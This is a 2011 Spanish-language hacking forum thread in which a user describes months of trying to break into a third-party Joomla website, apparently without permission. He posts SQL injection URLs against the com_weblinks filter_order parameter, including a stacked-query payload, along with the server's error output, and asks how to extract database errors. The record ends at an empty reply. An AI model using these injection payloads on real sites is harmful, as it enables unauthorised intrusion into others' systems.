elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Joomla hack...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Joomla hack...  (Leído 9,857 veces)
bruno9111

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Joomla hack...
« en: 14 Abril 2011, 12:38 pm »

Hola a todos.
LLevo ya un par de meses intentando entrar en una pagina web en joomla. Me plantie como reto una pagina bastante importante el hecho es que llevo meses estudiandola y no le he podido sacar nada. Hasta ayer, estaba haciendo unas pruebas y me di cuenta que una parte es vulnerable,

/index.php?option=com_weblinks&view=category&id=2:asdas&limit=10&filter_order_Dir=&filter_order=%00--

filter_order es injectable. entonces me devuelve el siguiente error la web:



Código:
Joomla! Specific Links

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /cms/libraries/joomla/database/database/mysql.php on line 344

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /cms/libraries/joomla/database/database/mysql.php on line 344
Web LinksA selection of links that are all related to the Joomla! Project.

Warning: Invalid argument supplied for foreach() in /cms/components/com_weblinks/views/category/tmpl/default_items.php on line 38

Pero si por ejemplo en vez de %00-- pongo DESC;SELECT+'X'--

Me suelta el mismo error, osea, no logro que me suelte el error de: en la tabla tal... etc. Existe algun tipo de proteccion para que el servidor no muestre los errores o algo?

A alguien se le occurre algo?
Thank yous
En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Joomla hack...